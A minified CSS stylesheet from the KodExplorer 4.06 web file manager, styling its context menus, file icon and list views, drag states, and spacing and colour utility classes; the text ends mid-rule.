.context-menu-item.hover > .context-menu-list{display:block;}.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon{color:#aaa;}.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item .context-menu-accesskey{text-decoration:underline;}.context-menu-list .context-menu-item .line-top{border-top:1px solid #ddd !important;}.font-icon.icon-home,.x-tree-self{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;filter:none;-ms-filter:none;}.font-icon.icon-home:before,.x-tree-self:before{content:"" !important;}.font-icon.icon-circle-arrow-up{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.font-icon.icon-circle-arrow-up:before{content:"" !important;}.x-tree-fav.small{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.x-tree-fav.small:before{content:"" !important;}.frame-right #search .font-icon.icon-search{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -736px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;margin-top:4px;}.frame-right #search .font-icon.icon-search:before{content:"" !important;}.context-menu-list .font-icon:before{color:#249dff;background-image:-webkit-linear-gradient(2deg,#249dff,#08558a);background-clip:text;text-fill-color:transparent;-webkit-text-fill-color:transparent;-webkit-background-clip:text;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{opacity:0.3;filter:alpha(opacity=30);}.context-menu-list .context-menu-item.search .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 0px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.search .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open .font-icon,.context-menu-list .context-menu-item.open-the-path .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open .font-icon:before,.context-menu-list .context-menu-item.open-the-path .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.upload .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.upload .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.down .font-icon,.context-menu-list .context-menu-item.download .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.down .font-icon:before,.context-menu-list .context-menu-item.download .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.cute .font-icon,.context-menu-list .context-menu-item.cute-to .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.cute .font-icon:before,.context-menu-list .context-menu-item.cute-to .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.copy .font-icon,.context-menu-list .context-menu-item.copy-to .font-icon,.context-menu-list .context-menu-item.copy-see .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -96px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.copy .font-icon:before,.context-menu-list .context-menu-item.copy-to .font-icon:before,.context-menu-list .context-menu-item.copy-see .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt:before{content:"" !important;}.context-menu-list .context-menu-item.newfile .icon-expand-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfile .icon-expand-alt:before{content:"" !important;}.context-menu-list .context-menu-item.rname .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.rname .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.past .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.past .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.remove .font-icon,.context-menu-list .context-menu-item.fav-remove .font-icon,.context-menu-list .context-menu-item .close .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.remove .font-icon:before,.context-menu-list .context-menu-item.fav-remove .font-icon:before,.context-menu-list .context-menu-item .close .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.zip .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.zip .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt:before{content:"" !important;}.context-menu-list .context-menu-item.share .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-15px -703px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.share .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open-text .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -702px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open-text .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.setBackground .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -609px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.setBackground .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.fav .font-icon,.context-menu-list .context-menu-item.fav-page .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.fav .font-icon:before,.context-menu-list .context-menu-item.fav-page .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0px -577px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture:before,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture:before{content:"" !important;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -528px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort:before{content:"" !important;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -625px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-code-fork{display:inline-block;background-image:url("../../../images/file_icon/icon_app/history.png");width:16px !important;background-repeat:no-repeat;background-size:100% 100%;}.context-menu-list .context-menu-item .font-icon.icon-code-fork:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-info{color:#fff !important;background:#c4e5ff;text-align:center;width:15px;border-radius:50%;height:15px;line-height:15px;margin-right:15px;box-shadow:0 0 0 1px #6db9f5;}.select-container{position:absolute;cursor:default;width:0px;height:0px;border:1px solid #005ec9;background-color:#63acff;z-index:1000;opacity:0.5;filter:alpha(opacity=50);}.select-container:hover{cursor:default;}.file-draging{position:absolute;left:0;top:0px;z-index:1000;pointer-events:none;opacity:0.95;}.file-draging.file-list-icon,.file-draging.file-list-list,.file-draging.file-list-split{z-index:1000;overflow:visible;}.file-draging.file-list-icon div.file,.file-draging.file-list-list div.file,.file-draging.file-list-split div.file{clear:both;position:absolute;margin:0;transition:none !important;}.file-draging.file-list-icon div.file.handle_target,.file-draging.file-list-list div.file.handle_target,.file-draging.file-list-split div.file.handle_target{z-index:999;}.draggable-dragging{z-index:9999;clear:both !important;pointer-events:none;position:absolute !important;padding:5px;opacity:0.9;filter:alpha(opacity=90);background:#4285f4;border-radius:4px;color:#fff;box-shadow:3px 5px 15px rgba(0,0,0,0.2);font-size:1.15em;}.draggable-dragging .drag-number{display:none;}.draggable-dragging span{line-height:25px;padding-left:5px;padding-right:15px;}.draggable-dragging span .font-icon{display:inline-block;width:22px;height:22px;text-align:center;line-height:22px;color:#fff;font-size:1.0em;font-weight:800;margin-right:10px;border-radius:12px;}.draggable-dragging span .bg-default{background:#b9e0ff;color:#4285f4;}.draggable-dragging span .bg-ok{background:#6ee273;}.draggable-dragging span .bg-error{background:#FB2500;}.draggable-dragging span b{padding-right:15px;}.item-file-draging{opacity:0.5;filter:alpha(opacity=50);}.selectDragDraging .file-list-icon .file-select-drag-temp{transform:scale(1.1,1.1);}.file-continer .file .filename .title.db-click-rename{cursor:text;}.file-continer .file .item-menu{display:none;position:absolute;right:4px;top:4px;width:14px;height:14px;box-sizing:content-box;text-align:center;border:1px solid #ddd;background:#fff;cursor:pointer;z-index:50;border-radius:2px;}.file-continer .file .item-menu:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.file-continer .file .item-menu:hover .cert{border-top-color:#3399ff;}.file-continer .file .item-menu .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.file-continer .file .item-select{display:none;position:absolute;right:4px;top:4px;width:14px;height:14px;box-sizing:content-box;text-align:center;border:1px solid #ddd;background:#fff;cursor:pointer;z-index:50;border-radius:2px;padding:2px;left:5px;border-radius:50%;background:rgba(0,0,0,0.05);border:none;color:#fff;}.file-continer .file .item-select:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.file-continer .file .item-select:hover .cert{border-top-color:#3399ff;}.file-continer .file .item-select .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.file-continer .file .item-select:hover{color:#fff;background:rgba(0,0,0,0.2);box-shadow:none;}.file-continer .file .item-select .item-check{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;font-size:12px;text-shadow:none;}.file-continer .file .item-select .item-check:after{content:"\f00c";position:relative;top:-1px;}.file-continer .file.hover .item-menu,.file-continer .file.select .item-menu,.file-continer .file.file-select-drag-temp .item-menu{display:block;}.file-continer .file.hover .item-select,.file-continer .file.select .item-select,.file-continer .file.file-select-drag-temp .item-select{display:block;}.file-continer .file.select .item-select{color:#fff;background:#3b8cff;}.file-continer.file-list-split .file .item-menu{top:3px;right:25px;}.file-continer.file-list-split .file .item-select{top:2px;right:45px;left:auto;}.file-continer.file-list-list .file .item-menu{top:4px;right:5px;}.file-continer.file-list-list .file .item-select{top:4px;right:25px;left:auto;}.file-list-icon{padding:10px 20px 0 10px;display:flex;justify-content:space-between;flex-wrap:wrap;align-items:flex-start;}.file-list-icon:after{width:82px;content:"";display:block;}.file-list-icon .flex-empty{width:75px;border:1px solid transparent;margin:0;margin-right:10px;margin-bottom:10px;visibility:hidden;height:0 !important;}.file-list-icon .meta-info{height:22.5px;width:22.5px;margin-right:6.75px;margin-top:-22.5px;position:absolute;right:0;}.file-list-icon .meta-info img{width:100%;height:100%;}.file-list-icon .file{color:#335;border:1px solid transparent;box-shadow:0px 0px 2px rgba(255,255,255,0);-webkit-transition:background 0.2s, border 0.2s, color 0.2s;-moz-transition:background 0.2s, border 0.2s, color 0.2s;-o-transition:background 0.2s, border 0.2s, color 0.2s;-ms-transition:background 0.2s, border 0.2s, color 0.2s;transition:background 0.2s, border 0.2s, color 0.2s;width:60px;height:75px;text-decoration:none;margin:0;margin-right:10px;margin-bottom:10px;overflow:hidden;float:left;}.file-list-icon .file .ico{-webkit-transition:all 0.168s;-moz-transition:all 0.168s;-o-transition:all 0.168s;-ms-transition:all 0.168s;transition:all 0.168s;}.file-list-icon .file.hover{border:1px solid #dedede;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fafafa', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fafafa,#eeeeee);background-image:-moz-linear-gradient(top,#fafafa,#eeeeee);background-image:-o-linear-gradient(top,#fafafa,#eeeeee);background-image:-ms-linear-gradient(top,#fafafa,#eeeeee);background-image:linear-gradient(top,#fafafa,#eeeeee);-pie-background:linear-gradient(to top,#fafafa,#eeeeee);border-radius:3px;}.file-list-icon .file .filename{width:60px;cursor:default;text-align:center;word-break:break-all;font-size:1.0em;margin:0 auto;line-height:1.5em;padding-bottom:5px;}.file-list-icon .file .filename .textarea{position:absolute;font-size:1.0em;text-align:center;margin-left:-1px;margin-top:-3px;}.file-list-icon .file .filename #pathRenameTextarea,.file-list-icon .file .filename .newfile{width:60px;padding:0px 0 4px 0;margin-top:0px;overflow-y:hidden;border:1px solid #888;font-size:1.0em;text-align:center;line-height:1.5em;position:absolute;z-index:999;margin-top:2px;border-bottom-left-radius:3px;border-bottom-right-radius:3px;}.file-list-icon .file .filename #pathRenameTextarea:focus,.file-list-icon .file .filename .newfile:focus{outline:none;}.file-list-icon .file.select,.file-list-icon .file.file-select-drag-temp{border:1px solid #d2d2d2;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f3f3f3', endColorstr='#d9d9d9');background-image:-webkit-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-moz-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-o-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-ms-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:linear-gradient(top,#f3f3f3,#d9d9d9);-pie-background:linear-gradient(to top,#f3f3f3,#d9d9d9);border-radius:3px;padding:0px;}.file-list-icon .file.file-icon-edit{overflow:visible;}.file-list-icon .file.file-icon-edit .filename{position:absolute;z-index:99;}.file-list-icon .file .ico{height:60px;width:60px;padding-top:4px;text-align:center;vertical-align:middle;display:table-cell;}.file-list-icon .file .ico img{height:100% \9;max-height:100%;max-width:100%;border-radius:5px;}.file-list-icon .file .ico.picture{background:none;width:50px;padding-left:5px;}.file-list-icon .file .ico.picture img{-webkit-box-shadow:1px 1px 5px rgba(0,0,0,0.2);-moz-box-shadow:1px 1px 5px rgba(0,0,0,0.2);box-shadow:1px 1px 5px rgba(0,0,0,0.2);width:100% \9;max-width:100%;border-radius:0px;}.file-list-icon .file .ico.picture img.lazyload-ready{-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;}@media screen and (max-width:100000px){div.file-list-icon div.file{ display:inline-block;max-height:152px;vertical-align:top;float:none;height:auto;}}.context-menu-item.set-file-icon-size .box-size-smallx{font-size:0.9em;}.context-menu-item.set-file-icon-size .box-size-small{font-size:1.0em;}.context-menu-item.set-file-icon-size .box-size-default{font-size:1.15em;}.context-menu-item.set-file-icon-size .box-size-big{font-size:1.25em;}.context-menu-item.set-file-icon-size .box-size-bigx{font-size:1.35em;}#list-type-header{z-index:5;position:absolute;width:100%;top:85px;}#main-title{background:#fff;border-bottom:1px solid #e3e3e3;box-shadow:0 2px 10px rgba(0,0,0,0.06);}#main-title .box-shadow(1px 2px 15px #dde) +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100993.0041] */ +body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d7500